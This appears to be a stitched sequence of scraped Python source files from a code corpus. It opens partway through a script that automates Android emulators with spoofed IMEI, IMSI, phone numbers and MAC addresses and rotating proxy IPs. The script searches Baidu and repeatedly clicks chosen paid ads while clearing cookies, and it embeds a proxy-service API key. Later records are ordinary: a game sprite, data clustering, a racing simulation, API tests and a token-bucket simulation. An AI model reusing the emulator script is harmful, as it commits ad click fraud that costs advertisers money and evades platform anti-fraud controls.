\"http://webapi.http.zhimacangku.com/getip?num=1&type=1&pro=&city=0&yys=100017&port=1&pack=63643&ts=0&ys=0&cs=0&lb=1&sb=0&pb=45&mr=1®ions=&gm=4\"\n self.ua = random.choice(self.UA)\n print(self.ua)\n time.sleep(random.random())\n ip = requests.get(self.ip_url, timeout=5).text\n if \"再试\" in str(ip):\n time.sleep(random.randint(1, 4))\n ip = requests.get(self.ip_url, timeout=5).text\n # 如果没有在白名单,就添加白名单\n elif \"请添加白名单\" in str(ip):\n self_ip = re.compile('\"请添加白名单(.*?)\",\"', re.S).findall(str(ip))[0]\n print(\"白名单添加中,本机IP:\", self_ip)\n try:\n x = requests.get(\n \"http://web.http.cnapi.cc/index/index/save_white?neek=79185&appkey=7b4bb8a059ff41c8f6782f11e73bff30&white={}\".format(\n self_ip))\n print(x.text)\n except Exception as f:\n print(\"白名单添加错误》》》\", f)\n time.sleep(1)\n ip = requests.get(self.ip_url, timeout=5).text\n self.ip = ip.strip()\n try:\n print(\"测试IP中》》》》:当前代理IP\", self.ip)\n i = int(self.ip.split(\":\")[1])\n except Exception as f:\n print(\"IP获取错误,程序退出\")\n return\n self.cap = {\n \"platformName\": \"Android\",\n # \"platformVersion\": \"5.1.1\", # 修改成匹配安卓版本,最好是版本低于7\n \"platformVersion\": \"5.1.1\", # 修改成匹配安卓版本,最好是版本低于7\n \"deviceName\": Cellphone_id, # 获取手机标识码\n # \"appPackage\": \"com.android.chrome\", # 混合APP用这个\n \"appActivity\": \"org.chromium.chrome.browser.ChromeTabbedActivity\",\n # org.mozilla.focus.activity.MainActivity\n \"browserName\": \"Chrome\", # 浏览器用这个\n # \"browserName\": \"Firefox\", # 浏览器用这个\n \"noReset\": True, # 不每次重置\n 'unicodeKeyboard': True, # 启用uni输入法\n 'resetKeyboard': True, # 结束后重置回原始输入法\n \"noSign\": True,\n \"autoAcceptAlerts\": True, # 同意协议\n \"automationName\": \"UiAutomator1\", # 指定UiAutomator版本,默认最新\n 'dontStopAppOnReset': False, # 不关闭应用\n 'autoGrantPermissions': True, # 自动获取权限\n # 允许传入chromeOptions参数\n \"chromeOptions\": {\n \"args\": ['--incognito', '--disable-search-geolocation-disclosure', \"user-agent={}\".format(self.ua),\n '--proxy-server=http://{}'.format(self.ip)]} # 允许传入chromeOptions参数\n }\n with open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\gjc.txt\", 'r')as f:\n m = f.read()\n self.gjcs = m.split(\"\\n\")\n # self.gjcs = gjc\n print(Cellphone_id, \"|||\", self.Appium_port)\n self.driver = webdriver.Remote(\"http://localhost:\" + str(self.Appium_port) + \"/wd/hub\", self.cap)\n with open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\pbc.txt\", 'r')as f:\n m = f.read()\n self.urls = m.split(\"\\n\")\n\n def huadong(self):\n x1 = int(self.driver.get_window_size()['width'] * 0.5)\n y1 = int(self.driver.get_window_size()['height'] * 0.75)\n y2 = int(self.driver.get_window_size()['height'] * 0.25)\n # for i in range(1):\n self.driver.swipe(x1, y2, x1, y1)\n # time.sleep(time.time())\n\n def insert_login(self, name, url):\n print(name, \"|\", url, \"|\", time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), \"|\", \"芝麻代理IP\")\n with open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\搜索日志.log\", \"a\", encoding=\"utf-8\")as f:\n f.write(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))\n f.write(\" \")\n f.write(name)\n f.write(\" \")\n f.write(url)\n f.write(\"\\n\")\n\n # 屏幕下滑\n def sub_hua_dong(self):\n x1 = int(self.driver.get_window_size()['width'] * 0.5)\n y1 = int(self.driver.get_window_size()['height'] * 0.75)\n y2 = int(self.driver.get_window_size()['height'] * 0.25)\n for i in range(random.randint(2, 4)):\n self.driver.swipe(x1, y1, x1, y2)\n self.driver.implicitly_wait(5)\n time.sleep(random.randint(1, 4))\n\n # 屏幕上滑\n def sup_hua_dong(self):\n x1 = int(self.driver.get_window_size()['width'] * 0.5)\n y1 = int(self.driver.get_window_size()['height'] * 0.75)\n y2 = int(self.driver.get_window_size()['height'] * 0.25)\n for i in range(random.randint(1, 3)):\n self.driver.swipe(x1, y2, x1, y1)\n self.driver.implicitly_wait(5)\n time.sleep(random.randint(1, 4))\n\n # @retry(stop_max_attempt_number=3)\n def get_baidu_index(self, name):\n try:\n print(\"打开百度\")\n self.driver.get(\"https://m.baidu.com/\")\n self.driver.implicitly_wait(2)\n # self.huadong()\n try:\n # self.driver.find_element_by_id(\"index-kw\")\n self.driver.find_element_by_xpath('//input[@type=\"search\"]')\n except:\n self.driver.implicitly_wait(1)\n self.driver.refresh()\n print(\"刷新\")\n self.driver.implicitly_wait(1)\n # name1 = \"IP\"\n name1 = list(jieba.cut(name))\n for i in name1:\n # self.driver.find_element_by_xpath('//input[@type=\"search\"]').send_keys(i)\n self.driver.find_element_by_id(\"index-kw\").send_keys(i)\n time.sleep(random.random())\n try:\n self.driver.find_element_by_id(\"index-bn\").click()\n except:\n print(\"提交错误\")\n self.driver.find_element_by_id(\"index-bn\").send_keys(Keys.ENTER)\n except Exception as f:\n self.driver.switch_to.alert.accept()\n print(\"网络错误\")\n return 0\n else:\n return 1\n\n def _next(self, i):\n v = random.randint(0, 1)\n if v:\n self.driver.switch_to.window(self.driver.window_handles[-1])\n print(\"第\", i, \"次点击\", self.driver.current_url)\n x = len(self.driver.find_elements_by_xpath(\"//a\"))\n self.driver.find_elements_by_xpath(\"//a\")[random.randint(5, x)].click()\n self.sub_hua_dong()\n\n def bak(self, name):\n try:\n self.driver.implicitly_wait(10)\n self.sup_hua_dong()\n x = self.driver.find_elements_by_xpath(\"//*[contains(@class,'c-showurl')]\")\n m = list(filter(lambda v: \"广告\" in v.get_attribute('textContent'), x)) # 筛选出有广告关键字的A标签\n # print(\"筛选出有广告关键字的A标签\",m)\n m1 = []\n for i in m:\n print(i.get_attribute('textContent'))\n # for il in self.urls:\n # if il not in i.get_attribute('textContent'):\n # m1.append(i)\n # print(\"筛选屏蔽的\",m1)\n # i2 = random.choice(m1)\n # print(\"随机屏蔽的\",i2)\n te = i.get_attribute('textContent')\n # te1 = str(te).replace(\"广告\",\"\")\n # for i in self.urls:\n # if i in te:\n # return\n # if \"pintai7\" in te:\n # return\n # # elif \"pintai6\" in te:\n # # return\n # elif \"21cxhua\" in te:\n # return\n # print(te)\n if \"pintai6\" in te:\n try:\n i.click()\n except Exception as f:\n traceback.print_exc()\n print(f)\n self.driver.execute_script(\"arguments[0].click();\", i)\n self.driver.implicitly_wait(10)\n # for i in self.urls:\n # if i in self.driver.current_url:\n # return\n print(self.driver.current_url)\n self.sub_hua_dong()\n try:\n self.driver.switch_to.window(self.driver.window_handles[-1])\n self.driver.implicitly_wait(5)\n print(self.driver.title)\n print(\"选中:\", name, te, self.driver.current_url)\n self.insert_login(name, url=self.driver.current_url)\n except Exception as f:\n print(f)\n try:\n for i in range(5):\n self._next(i)\n except Exception as f:\n print(\"下一页错误,程序退出\")\n for i in range(5):\n self._next(i)\n # time.sleep(random.randint(10, 30))\n print('正在退出')\n return\n except UnexpectedAlertPresentException:\n self.driver.switch_to.alert.accept()\n # self.chear_chrom_data()\n\n # 杀死当前mitmproxy进程\n def kill_mitmproxy(self):\n p = os.popen('netstat -aon|findstr \"{}\"'.format(self.mitmproxy_port))\n p2 = p.read()\n # 第一版:\n\n p2 = str(p2).split(\"\\n\")\n p2 = p2[0:-1]\n p3 = []\n for i in p2:\n x = re.compile(\"(\\d{1,5})$\").findall(i)[0]\n if int(x) != 0:\n p3.append(x)\n p3 = set(p3)\n p3 = list(p3)\n for i in p3:\n p = os.popen('tasklist|findstr \"{}\"'.format(i))\n p2 = p.read()\n if \"thon\" in str(p2):\n subprocess.Popen('taskkill -PID {} -F'.format(i))\n print(\"结束mitmprxoy服务,端口号:\", i)\n # 第二版改写,使用lambda不成功\n # for i in list(filter(lambda x: int(x) != 0, set(\n # sum(list(map(lambda x: re.compile(\"(\\d{1,5})$\").findall(x), str(p2).split(\"\\n\")[0:-1])), []))))[1:]:\n # print(\"结束mitmprxoy服务,端口号:\", i)\n # subprocess.Popen('taskkill -PID {} -F'.format(i))\n\n # 清除浏览器Cookies和缓存\n def chear_chrom_data(self):\n try:\n print(\"删除cokies\")\n self.driver.delete_all_cookies()\n print(\"清除本地缓存\")\n self.driver.execute_script(\"window.localStorage.clear();\")\n except Exception as f:\n print(\"清缓失败\", f)\n\n # 获取代理IP\n def get_ip(self):\n ip = requests.get(self.ip_url, timeout=5).text\n ip = ip.strip()\n if len(ip) < 22:\n print(\"当前IP:\", ip)\n return ip\n else:\n time.sleep(1)\n print(\"提取失败:\", ip)\n self.get_ip()\n\n # 启动mitmproxy服务\n def start_mitmproxy_server(self):\n self.kill_mitmproxy()\n p = os.path.exists(\n 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\vps3\\\\mitmproxy_log\\\\' + str(self.mitmproxy_port) + '.log')\n if p:\n pass\n else:\n print(\"文件不存在,创建中\")\n with open('./mitmproxy_log/' + str(self.mitmproxy_port) + '.log', \"w\") as fp:\n pass\n cmd = \"mitmdump --mode=upstream:{} -p {}\".format(\n self.get_ip(), str(self.mitmproxy_port))\n print(\"启动mitmproxy:\", cmd)\n # return\n subprocess.Popen(cmd, stdout=open(\n 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\vps3\\\\mitmproxy_log\\\\' + str(self.mitmproxy_port) + '.log', 'a'),\n stderr=subprocess.STDOUT)\n time.sleep(1)\n\n def run(self):\n # self._ip()\n # self.start_mitmproxy_server()\n # ua = random.choice(self.UA)\n # self.redis.set(\"UA\", ua)\n try:\n self.driver.delete_all_cookies()\n except:\n pass\n\n try:\n name = random.choice(self.gjcs)\n try:\n self.driver.implicitly_wait(10)\n m = self.get_baidu_index(name)\n if m == 0:\n print(m)\n self.driver.quit()\n return\n except Exception as f:\n print(f)\n self.driver.quit()\n return\n urls = self.driver.find_elements_by_xpath('//div[@class=\"c-showurl c-line-clamp1\"]')\n if not urls:\n # self.start_mitmproxy_server()\n # time.sleep(4)\n self.driver.refresh()\n self.sub_hua_dong()\n time.sleep(random.randint(1, 4))\n self.sup_hua_dong()\n self.driver.implicitly_wait(5)\n self.bak(name)\n self.chear_chrom_data()\n except Exception as f:\n pass\n finally:\n try:\n self.chear_chrom_data()\n except Exception as f:\n pass\n print(\"关闭浏览器\")\n self.driver.quit()\n\n\ndef run_app(Cellphone_id, Mitmproxy_port, Appium_port):\n # hk = str(Cellphone_id).split(\":\")[1]\n # if hk:\n # if int(hk) == 62001:\n # Mitmproxy_port = 8080\n # else:\n # k = int(hk) - 62025\n # Mitmproxy_port += 1 + int(k)\n # Cellphone_id: 模拟器ID\n # Mitmproxy_port: mitmproxy端口号\n try:\n # 启动之前先查看端口是否占用,如果占用就杀死对应进程\n p = os.popen('netstat -aon|findstr \"{}\"'.format(Appium_port))\n p2 = p.read()\n for i in list(filter(lambda x: int(x) != 0, set(\n sum(list(map(lambda x: re.compile(\"(\\d{1,5})$\").findall(x), str(p2).split(\"\\n\")[0:-1])), [])))):\n print(\"结束Appium服务:端口号:\", i)\n subprocess.Popen('taskkill -PID {} -F'.format(i))\n # 启动Appium服务\n host = '127.0.0.1'\n bootstrap_port = str(Appium_port + 1)\n cmd = 'appium -a ' + host + ' -p ' + str(Appium_port) + ' -bp ' + str(\n bootstrap_port + \" -U \" + str(Cellphone_id))\n print(Cellphone_id, \"|||\", cmd)\n subprocess.Popen(cmd, shell=True, stdout=open(\n 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\vps3\\\\appium_log\\\\' + str(Appium_port) + '.log', 'a'),\n stderr=subprocess.STDOUT)\n while True:\n try:\n print(\"Cellphone_id: \", Cellphone_id, \" Mitmproxy_port: \", Mitmproxy_port, \" Appium_port:\",\n Appium_port)\n # 启动程序\n time.sleep(random.randint(1, 4))\n mians = Chrom_Run(Cellphone_id, Mitmproxy_port, Appium_port)\n mians.run()\n # name=\"name\"\n # mians.get_baidu_index(name)\n print(\"一次点击完成\")\n except:\n pass\n except Exception as f:\n print(f)\n\n\nif __name__ == \"__main__\":\n # 随机MAC\n def randomMAC():\n mac = [0x52, 0x54, 0x00,\n random.randint(0x00, 0x7f),\n random.randint(0x00, 0xff),\n random.randint(0x00, 0xff)]\n return ':'.join(map(lambda x: \"%02x\" % x, mac))\n\n\n # 结束之前的adb服务\n subprocess.Popen('adb kill-server')\n time.sleep(1)\n subprocess.Popen('adb start-server')\n time.sleep(1)\n # 结束之前的夜神模拟器\n subprocess.Popen('nox -quit')\n time.sleep(0.2)\n for i in range(1, 5):\n subprocess.Popen('nox -clone:Nox_{} -quit'.format(str(i)))\n time.sleep(0.2)\n time.sleep(5)\n # 重新启动夜神模拟器\n for i in range(1, 5):\n phone = random.randint(18511223344, 18711223344)\n phoneNumber = random.randint(18511223344, 18711223344)\n IMEI = random.randint(861414011000000, 861414011999999)\n IMSI = random.randint(460010000000000, 460019999999999)\n MAC = str(randomMAC())\n subprocess.Popen(\n \"Nox.exe -clone:Nox_{} -phoneNumber:{} -imei:{} -imsi:{} -mac:{} -root:Ture\".format(i, phoneNumber, IMEI,\n IMSI, MAC))\n time.sleep(10)\n time.sleep(20)\n p = os.popen(\"adb devices\")\n x = str(p.read()).split(\"\\n\")[1:]\n Cellphone_ids = []\n for i in x:\n if i != \"\":\n x = str(i).split(\"\\t\")[0]\n if \"device\" in str(i).split(\"\\t\")[1]:\n Cellphone_ids.append(x)\n print(Cellphone_ids)\n pools = Pool()\n # # 创建进程池\n while True:\n try:\n for Cellphone_id, mitmproxy_port, Appium_port in zip(Cellphone_ids, range(8080, 8088),\n range(4723, 8080, 2)):\n pools.apply_async(run_app, args=(Cellphone_id, mitmproxy_port, Appium_port))\n pools.close()\n pools.join()\n except:\n pass\n","sub_path":"Appium_run_03.py","file_name":"Appium_run_03.py","file_ext":"py","file_size_in_byte":18202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21696997","text":"from .Base import *\n\nclass Sprite(Base):\n\n def __init__(self, x, y, ancho, alto, ruta):\n Base.__init__(self, x, y, ancho, alto, ruta)\n\n def Animacion_Corazones(self, frames_totales, ventana):\n if self.rect.x <= 750:\n self.rect.x += 6\n if frames_totales % 5 == 0 and self.ancho > 0 and self.alto > 0:\n self.ancho -= 1\n self.alto -= 1\n self.image = pygame.transform.scale(self.image, (self.ancho, self.alto))\n self.image = pygame.image.load(\"corazon_invertido.png\")\n self.ancho -= 1\n self.alto -= 1\n self.image = pygame.image.load(\"Corazon.png\")\n self.image = pygame.transform.scale(self.image, (self.ancho, self.alto))\n if self.rect.x > 750:\n self.rect.y -= 6\n self.rect.x += 2\n\n def Animacion_Monedas(self, posx, posy):\n self.rect.y -= 15\n if self.rect.y < 250:\n self.rect.x += 30\n else:\n self.rect.x += 25\n if self.rect.x > 750 and self.rect.y < 200:\n self.rect.x = posx\n self.rect.y = posy\n return True","sub_path":"Clases/Sprites.py","file_name":"Sprites.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"557974748","text":"import numpy as np\nimport pandas as pd\nimport sqlite3 as sql\nimport matplotlib.pyplot as plt\nimport csv\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.cluster import MiniBatchKMeans\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import silhouette_score\n\n# read in aggregate data on each dearlership from DB. Then cluster the 96\n# dealership points in that N-dimensional space.\n\nclass Model:\n def __init__( self, **kwargs ):\n dbPath = kwargs[ 'pathToDB' ]\n rankFilePath = kwargs[ 'pathToRankFile' ]\n self.readROs( dbPath )\n\n def readROs( self, dbPath ):\n conn = sql.connect( dbPath )\n cursor = conn.cursor()\n query = \"\"\" SELECT Mileage, Customer_Total, Warranty_Total,\n Customer_Total + Warranty_Total + Internal_Total AS sales,\n Labor_Time FROM orders WHERE Mileage != '';\"\"\"\n cursor.execute( query )\n res = cursor.fetchall()\n self.orders = np.array( res, dtype = 'float' )\n\n \n def readDealerRanks( self, rankFilePath ):\n pass\n \n\n def readData( self, **kwargs ):\n # read in data from SQL DB to a pandas data frame\n path = kwargs[ 'pathToDB' ]\n conn = sql.connect( path )\n cursor = conn.cursor()\n\n query = \"\"\"SELECT dealer_id, num_ROs, sales, efficiency, outOfWarrantyFraction,\n quarterly_growth FROM metric1;\"\"\"\n cursor.execute( query )\n res = cursor.fetchall()\n res = np.array( res )\n\n tmp = res[ :, 0 ]\n dealerIDs = [ int( x ) for x in tmp ]\n df = pd.DataFrame( np.nan, index = dealerIDs,\n columns = [ \"volume\", \"sales\", \"efficiency\",\"outOfWarranty\",\n \"growth\", \"marketAffluence\", \"primaryMake\" ] )\n df.iloc[ :, :5 ] = res[ :, 1: ]\n\n # Fill up a dictionary containing median household income for each zip code\n zipDict = {}\n path = kwargs[ 'pathToZIPFile' ]\n with open( path, 'rU' ) as fp:\n reader = csv.reader( fp )\n reader.next()\n for row in reader:\n zipDict[ row[ 0 ].rjust( 5, '0' ) ] = float( row[ 1 ] )\n medianIncome = np.median( zipDict.values() )\n\n # calculate mean household income from each dealership's market\n query = \"\"\"SELECT dealer_id, zip FROM orders;\"\"\"\n cursor.execute( query )\n orderZips = cursor.fetchall()\n\n # make a dictionary holding the average income of each dealer's market\n marketAffluence = {}\n\n for item in orderZips:\n zipcode = item[ 1 ][ :5 ] # only take 5-digit zip\n if zipcode in zipDict: # only use zips we have data for\n dealer = item[ 0 ]\n if dealer in marketAffluence:\n # calculate running average\n N = marketAffluence[ dealer ][ 1 ]\n tmp = marketAffluence[ dealer ][ 0 ] * N\n tmp += zipDict[ zipcode ]\n tmp /= ( N + 1 )\n marketAffluence[ dealer ] = [ tmp, N + 1 ]\n else:\n # insert for the first time\n marketAffluence[ dealer ] = [ zipDict[ zipcode ], 1 ]\n\n # put it in the dataframe\n for dealer in marketAffluence:\n if dealer in df.index: # some dealers get dropped out of metric1?\n df.loc[ int( dealer ), 'marketAffluence' ] = \\\n marketAffluence[ dealer ][ 0 ]\n\n # get most serviced make for each dealer\n query = \"\"\"SELECT dealer_id, make_Name from (select max(theCount),\n dealer_ID, make_Name FROM\n (select dealer_ID, count(make_name) AS theCount, make_name from\n orders GROUP BY dealer_id, make_name)\n GROUP BY dealer_ID)\n GROUP BY dealer_ID;\"\"\"\n cursor.execute( query )\n res = cursor.fetchall()\n makeDict = { \"NISSAN\": 0, \"INFINITI\": 1 }\n\n for item in res:\n dealer = item[ 0 ]\n make = item[ 1 ]\n if dealer in df.index:\n if make in makeDict:\n df.loc[ dealer, \"primaryMake\" ] = makeDict[ make ]\n else:\n df.loc[ dealer, \"primaryMake\" ] = 3\n \n self.data = df\n\n def findBestClustering( self, maxClusters = 5 ):\n cost = []\n score = []\n for nClusters in range( 2, maxClusters ):\n inertia, silhouette = self.cluster( nClusters )\n cost.append( inertia )\n score.append( silhouette )\n\n plt.plot( range( 2, maxClusters ), cost )\n plt.show()\n \n import pdb; pdb.set_trace()\n \n \n def cluster( self ):\n #data = self.data.values[ :, :-1 ]\n data = self.orders\n \n # feature scaling\n scaler = MinMaxScaler()\n X = scaler.fit_transform( data )\n \n clf = KMeans( n_clusters = 3, n_init = 50, n_jobs = -1 )\n clf.fit( X )\n\n import pdb; pdb.set_trace()\n \n labels = kmeans.labels_\n\n score = silhouette_score( X, labels, metric = 'euclidean' )\n return kmeans.inertia_, score\n \n #self.inertia = kmeans.inertia_\n #self.silhouette_score = score\n \n\ndef main( **kwargs ):\n model = Model( **kwargs )\n model.cluster()\n import pdb; pdb.set_trace()\n\nif __name__ == '__main__':\n kwargs = { 'pathToDB': 'subset.sql',\n 'pathToRankFile': 'ranking.csv',\n 'pathToZIPFile': 'MedianZIP.csv'\n }\n main( **kwargs )\n\n\n\n \n \n \n\n\n\n\n\n\n\n\n","sub_path":"auto/dealerClustering2.py","file_name":"dealerClustering2.py","file_ext":"py","file_size_in_byte":5760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"572141028","text":"import numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport racing_env, racing_car, racing_sim, policy, utils\n\n\ndef tracking(args):\n if args[\"simulation\"]:\n track_spec = np.genfromtxt(\"data/track_spec/default.csv\", delimiter=\",\")\n track_width = 1.0\n track = racing_env.ClosedTrack(track_spec, track_width)\n # setup ego car\n ego = racing_car.DynamicBicycleModel(name=\"ego\", param=racing_car.CarParam(edgecolor=\"black\"))\n ego.set_state_curvilinear(np.zeros((6,)))\n ego.set_state_global(np.zeros((6,)))\n if args[\"ctrl_policy\"] == \"pid\":\n ego.set_ctrl_policy(policy.PIDTracking(vt=0.8))\n elif args[\"ctrl_policy\"] == \"mpc-lti\":\n matrix_A = np.genfromtxt(\"data/sys/LTI/matrix_A.csv\", delimiter=\",\")\n matrix_B = np.genfromtxt(\"data/sys/LTI/matrix_B.csv\", delimiter=\",\")\n matrix_Q = np.diag([10.0, 0.0, 0.0, 0.0, 0.0, 10.0])\n matrix_R = np.diag([0.1, 0.1])\n ego.set_ctrl_policy(policy.MPCTracking(matrix_A, matrix_B, matrix_Q, matrix_R, vt=0.8))\n else:\n raise NotImplementedError\n ego.ctrl_policy.set_timestep(0.1)\n # setup simulation\n simulator = racing_sim.CarRacingSim()\n simulator.set_timestep(0.1)\n simulator.set_track(track)\n simulator.add_vehicle(ego)\n simulator.sim(sim_time=50.0)\n with open(\"./data/simulator/tracking.obj\", \"wb\") as handle:\n pickle.dump(simulator, handle, protocol=pickle.HIGHEST_PROTOCOL)\n else:\n with open(\"./data/simulator/tracking.obj\", \"rb\") as handle:\n simulator = pickle.load(handle)\n if args[\"plotting\"]:\n simulator.plot_simulation()\n simulator.plot_state(\"ego\")\n if args[\"animation\"]:\n simulator.animate(filename=\"tracking\")\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ctrl-policy\", type=str)\n parser.add_argument(\"--simulation\", action=\"store_true\")\n parser.add_argument(\"--plotting\", action=\"store_true\")\n parser.add_argument(\"--animation\", action=\"store_true\")\n args = vars(parser.parse_args())\n tracking(args)\n","sub_path":"examples/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606014981","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndata = np.loadtxt(\"data.txt\").T\n\nx = np.arange(0,500)\nz = (x/5500)**2*np.log(x)\n \nplt.plot(data[0],data[1], 'ro-')\n\nplt.plot(x,z)\n\nplt.legend([\"Czas wykonania programu\",\"Krzywa $f(x)=x^2\\log x$\" ])\nplt.xlabel(\"Liczba węzłów\")\nplt.ylabel(\"Czas wykonania (s)\")\nplt.title(\n \"Czas wykonywania implementacji algorytmu Dijkstry\")\nplt.show()","sub_path":"semestr-1/BAL/dijkstra/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534232209","text":"from bioservices.quickgo import QuickGO\nfrom nose.plugins.attrib import attr\n\nclass test_quickGO(QuickGO):\n\n def __init__(self):\n super(test_quickGO, self).__init__(verbose=False, \n cache=False)\n\n def test_annotation_wrong_format(self):\n try:\n res = self.Annotation(tax='9606', frmt='tsddddddv')\n assert False\n except:\n assert True\n\n def test_annotation_format_col_compatibility(self):\n # if col provided, format can be only tsv\n try:\n res = self.Annotation(tax='9606', frmt='fasta', col=\"evidence\")\n assert False\n except:\n assert True\n\n # very slow !\n @attr('slow')\n def test_annotation_wrong_limit(self):\n try:\n res = self.Annotation(tax='9606', frmt='tsv', limit=-1)\n assert False\n except:\n assert True\n\n try:\n res = self.Annotation(tax='9606', frmt='tsv', limit=\"dummy\")\n assert False\n except TypeError:\n assert True\n except:\n assert False\n\n def test_annotation_no_protein_and_goid(self):\n try:\n self.Annotation(frmt='tsv', col=\"ref,evidence\",ref='PMID:*')\n assert False\n except ValueError:\n assert True\n\n def test_annotation_evidence(self):\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\", evidence=\"IDA\")\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\", evidence=[\"IDA\"])\n try:\n self.Annotation(protein='P12345', frmt='tsv',\n col=\"ref,evidence\",evidence=1)\n assert False\n except:assert True\n\n def test_annotation_aspect(self):\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\",aspect='F')\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\",aspect='C')\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\",aspect='P')\n try:\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\",aspect='dummy')\n assert False\n except:\n assert True\n\n\n def test_annotation_source(self):\n self.Annotation(protein='P12345', frmt='tsv',\n col=\"ref,evidence\",ref='PMID:*', source=\"UniProtKB\")\n self.Annotation(protein='P12345', frmt='tsv',\n col=\"ref,evidence\",ref='PMID:*', source=[\"UniProtKB\"])\n try:\n self.Annotation(protein='P12345', frmt='tsv',\n col=\"ref,evidence\",ref='PMID:*', source=111)\n assert False \n except:\n assert True\n\n def test_annotation_protein(self):\n print(self.Annotation(protein='P12345', frmt='tsv',\n col=\"ref,evidence\",ref='PMID:*'))\n\n def test_annotation_goid(self):\n print(self.Annotation(goid='GO:0003824', frmt='tsv',\n col=\"ref,evidence\"))\n\n def test_annotation_ref_PMID(self):\n res = self.Annotation(tax='9606', frmt='tsv', col=\"ref\",ref=\"PMID:*\")\n\n def test_annotation_qualifier(self):\n res = self.Annotation(tax='9606', frmt='tsv', \n col=\"ref,evidence,proteinID,goID,proteinTaxon,qualifier\",ref=\"PMID:*\", \n qualifier=\"NOT\")\n res = self.Annotation(tax='9606', frmt='tsv', \n col=\"ref,evidence,proteinID,goID,proteinTaxon,qualifier\",ref=\"PMID:*\", \n qualifier=[\"NOT\"])\n try:\n res = self.Annotation(tax='9606', frmt='tsv', \n col=\"ref,evidence,proteinID,goID,proteinTaxon,qualifier\",ref=\"PMID:*\", \n qualifier=1)\n assert False\n except:assert True\n\n def test_annotation_qualifier2(self):\n res = set([ x for x in self.Annotation(tax='9606', frmt='tsv', col=\"qualifier\",ref=\"PMID:*\").split()])\n assert 'NOT' in res\n\n def test_annotation_termUse(self):\n try:\n res = self.Annotation(tax='9606', frmt='tsv',\n col=\"qualifier\",ref=\"PMID:*\", termUse=\"slimdummy\")\n assert False\n except:\n assert True\n\n def test_Term(self):\n self.Term(\"GO:0003824\", frmt=\"obo\")\n self.Term(\"GO:0003824\", frmt=\"mini\")\n self.Term(\"GO:0003824\")\n try:\n self.Term(\"GO:0003824\", frmt=\"dummy\")\n assert False\n except:\n assert True\n\n try:\n self.Term(\"G:0003824\")\n assert False\n except:\n assert True\n\n\n def test_annotations_from_goid(self):\n self.Annotation_from_goid(\"GO:0003824\")\n\n def test_annotations_from_protein(self):\n self.Annotation_from_protein(\"P43403\")\n","sub_path":"test/test_go.py","file_name":"test_go.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435392301","text":"'''\nSimulates a token bucket traffic shaper w/ no queue (i.e. packets\nare dropped if no token is available).\nNote: In this version of the algorithm, each token = 1 packet.\n\nClick the \"run\" button up top to run the simulation.\n\nInput parameters (see INPUT PARAMS below):\n - Number of packets received by the shaper\n - Long term average arrival rate of packets (per second)\n - Token generation rate of the token bucket algorithm (per second)\n - Bucket size of token bucket algorithm\n\nOutput:\n - Simply prints the number of packets dropped by the system\n\nAuthor: Thomas Lin (t.lin@mail.utoronto.ca) 2018\n'''\n# INPUT PARAMS\nnumPackets = 10000 # Integer number\narrRate = 350 # Packet arrival rate\ntokenRate = 350 # Token generation rate\nbucketSize = 2 # Max tokens in bucket\n# END INPUT PARAMS\n\n# Library imports\nfrom random import expovariate\n\nprint(\"Simulating %s packets arriving at avg. rate %s\" % (numPackets, arrRate))\nprint(\"Token generation rate of %s and max bucket size of %s\" % (tokenRate, bucketSize))\n\ninterArrivals = [expovariate(arrRate) for i in range(numPackets)]\n\nnumTokens = 0\ndropCount = 0\n\nfor i in range(numPackets):\n numTokens = min(numTokens + tokenRate * interArrivals[i], bucketSize)\n\n if numTokens >= 1:\n # Can transmit packets\n numTokens -= 1\n else:\n # No available token; Drop packet\n dropCount += 1\n\nprint()\nprint(\"Number of packets dropped: %s\" % dropCount)\n\n\n","sub_path":"queueing/Token-Bucket-No-Queue/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"645463427","text":"from gzip import GzipFile\nfrom zipfile import ZipFile\nimport pandas as pd\nfrom pandas_gbq.gbq import TableCreationError\nimport re\n\n\ndef main(**kwargs):\n loaded_file_ids = set()\n zipfile_path = '/home/mjumbewu/Code/musa/musa-509/data/SafeGraph Data Purchase Nov-02-2021.zip'\n load_patterns_file(zipfile_path, loaded_file_ids)\n\n\ndef load_patterns_file(zipfile_path, loaded_file_ids):\n dataset_name = 'safegraph'\n file_id_pattern = re.compile(r'PA-CORE_POI-PATTERNS-(?P\\d{4}_\\d{2}).*')\n\n with ZipFile(open(zipfile_path, mode='rb')) as safegraph_multi_zipfile:\n zipfiles = [n for n in safegraph_multi_zipfile.namelist() if n.endswith('.zip')]\n for zf in zipfiles:\n 